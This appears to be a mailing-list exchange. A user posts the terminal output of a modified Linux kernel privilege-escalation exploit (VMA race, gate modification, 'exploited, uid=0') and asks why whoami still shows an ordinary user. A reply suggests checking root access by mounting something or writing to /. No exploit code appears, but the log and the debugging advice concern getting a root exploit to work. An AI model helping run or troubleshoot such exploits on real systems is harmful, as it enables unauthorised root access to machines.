A.J. Loonstra wrote:
I tried modifying the exploit not to use /dev/shm... but this is what happens:

~$ ./a.out
[+] SLAB cleanup
child 1 VMAs 287
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc5000000 - 0xc9d17000
Wait... |
[+] race won maps=6768
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xc594b000
[+] gate modified ( 0xffec94bf 0x0804ec00 )
[+] exploited, uid=0
sh-2.05a$ whoami
arnaud
sh-2.05a$ mount
/dev/hda1 on / type ext2 (rw,errors=remount-ro)
proc on /proc type proc (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/hda2 on /home type ext3 (rw)
$sh-2.05a$ echo $UID
0

It says it did exploit but it didn't...

A.

Try doing something that would require root (e.g. mount something, create a file in /, etc.).